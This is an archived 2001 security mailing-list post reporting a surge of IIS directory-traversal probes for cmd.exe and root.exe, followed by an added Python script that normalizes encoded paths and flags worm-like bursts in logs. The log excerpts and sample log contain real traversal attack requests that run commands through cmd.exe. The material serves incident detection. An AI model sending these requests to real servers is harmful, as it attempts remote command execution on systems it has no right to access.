Security Incidents mailing list archives

command execution attempts


From: "Keith.Morgan" <Keith.Morgan () Terradon com>
Date: Tue, 18 Sep 2001 09:59:23 -0400

Wow.  This morning we've been hit with a deluge of attempts at
....../cmd.exe?<args here> and attempts to access ...../root.exe?<args here>

My IDS is going haywire.  They're coming from diverse IPs, mostly in the
216.* class A.  This doesn't appear to be a standard code-red type thing.
Have a look at log excerpts...

This all appeared to kick off at roughly 9AM EST.  Have I missed some
prolific worm out there?  

2001-09-18 13:38:01 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+dir 401 -
2001-09-18 13:38:01 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe /c+dir 401 -
2001-09-18 13:38:05 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:05 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:07 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:07 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:07 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:08 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:08 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:08 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:09 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:09 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:10 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:10 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:10 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:11 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -


All of the offending IPs are following this exact pattern, indicating a
worm.

Keith T. Morgan
Chief of Information Security
Terradon Communications
keith.morgan () terradon com
304-755-8291 x142
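An added detection example, not from the post or the list: a Python script that parses IIS W3C extended log lines like the excerpt above, normalizes each request path the way a lenient decoder would (percent-decoding until stable so double encoding is caught, folding the overlong two-byte UTF-8 forms such as %c0%af and %c1%1c and the %5c backslash to a plain slash), flags requests for cmd.exe or root.exe, and groups them per source IP to separate a single probe from the rapid multi-path burst the post describes. The sample log is constructed after the excerpt: the server IP 10.0.0.5 and the second client 198.51.100.7 are placeholders, the field order is the IIS default of the era (an assumption), the "Á" in the archived lines is assumed to be the Latin-1 rendering of a %c1 byte, and one entry is given a 200 status to show the triage point a responder cares about: a 401 means the server refused the request, while a 200 on cmd.exe is the line to investigate.

```python
"""Flag cmd.exe / root.exe probing in IIS W3C extended logs and spot worm-like bursts.

Added example; the log below is constructed after the post's excerpt, not real traffic.
Assumed field order: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem
cs-uri-query sc-status sc-bytes
"""
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote_to_bytes

SAMPLE_LOG = """\
2001-09-18 13:38:01 216.230.91.177 - 10.0.0.5 80 GET /scripts/root.exe /c+dir 401 -
2001-09-18 13:38:01 216.230.91.177 - 10.0.0.5 80 GET /MSADC/root.exe /c+dir 401 -
2001-09-18 13:38:05 216.230.91.177 - 10.0.0.5 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:07 216.230.91.177 - 10.0.0.5 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:08 216.230.91.177 - 10.0.0.5 80 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:38:11 216.230.91.177 - 10.0.0.5 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:40:00 198.51.100.7 - 10.0.0.5 80 GET /index.html - 200 4096
2001-09-18 13:41:00 198.51.100.7 - 10.0.0.5 80 GET /images/logo.gif - 200 1200
"""

EXEC_TARGETS = (b"cmd.exe", b"root.exe")


def fold_overlong(data: bytes) -> bytes:
    """Collapse 0xC0/0xC1-led 2-byte sequences as a lenient decoder does:
    (lead & 0x1F) << 6 | (next & 0x3F), so %c0%af -> '/' and %c1%1c -> backslash.
    A strict UTF-8 decoder rejects these overlong forms, which is why a path
    check done before decoding misses them."""
    out, i = bytearray(), 0
    while i < len(data):
        if data[i] in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(((data[i] & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(data[i])
            i += 1
    return bytes(out)


def normalize_path(raw: str) -> bytes:
    """Percent-decode until stable, fold overlong bytes, map backslash to slash,
    lowercase: every traversal spelling ends up as the same plain '/../' form."""
    data = raw.encode("latin-1", "replace")  # an archived 'Á' becomes the 0xC1 byte
    for _ in range(3):  # bounded so a hostile input cannot keep us looping
        nxt = unquote_to_bytes(data)
        if nxt == data:
            break
        data = nxt
    return fold_overlong(data).replace(b"\\", b"/").lower()


def parse_line(line: str):
    """One W3C log line -> dict, or None for blanks, comments and short lines."""
    if not line or line.startswith("#"):
        return None
    f = line.split()
    if len(f) < 11:
        return None
    return {"time": datetime.strptime(f"{f[0]} {f[1]}", "%Y-%m-%d %H:%M:%S"),
            "client": f[2], "stem": f[7], "status": int(f[9])}


def classify(stem: str) -> dict:
    """Does the request target a command interpreter, and does it climb with '/../'?"""
    path = normalize_path(stem)
    return {"exec_target": any(t in path for t in EXEC_TARGETS),
            "traversal": b"/../" in path}


def analyze(log_text: str, window_seconds: int = 60, min_variants: int = 3) -> dict:
    """Per source IP: interpreter probes, distinct paths, traversal attempts, 200s.
    'worm_like' = at least min_variants distinct paths inside window_seconds, the
    one-IP, many-encodings, seconds-apart burst the post describes."""
    per_ip = defaultdict(lambda: {"n": 0, "stems": set(), "times": [], "trav": 0, "ok": 0})
    for line in log_text.splitlines():
        e = parse_line(line)
        if e is None:
            continue
        v = classify(e["stem"])
        if not v["exec_target"]:
            continue
        r = per_ip[e["client"]]
        r["n"] += 1
        r["stems"].add(e["stem"])
        r["times"].append(e["time"])
        r["trav"] += v["traversal"]
        r["ok"] += e["status"] == 200  # a 200 here means the interpreter may have run
    report = {}
    for ip, r in per_ip.items():
        span = (max(r["times"]) - min(r["times"])).total_seconds()
        report[ip] = {"attempts": r["n"], "distinct_paths": len(r["stems"]),
                      "traversal_attempts": r["trav"], "status_200": r["ok"],
                      "worm_like": len(r["stems"]) >= min_variants and span <= window_seconds}
    return report


if __name__ == "__main__":
    for ip, rec in analyze(SAMPLE_LOG).items():
        print(ip, rec)
```

Run against a real log by reading the file into analyze(); the normal browsing client never appears in the report because nothing it requested names an interpreter, while the scanning IP is reported with six distinct paths in ten seconds and one 200 response, which is the entry to pull for host-level follow-up.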


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
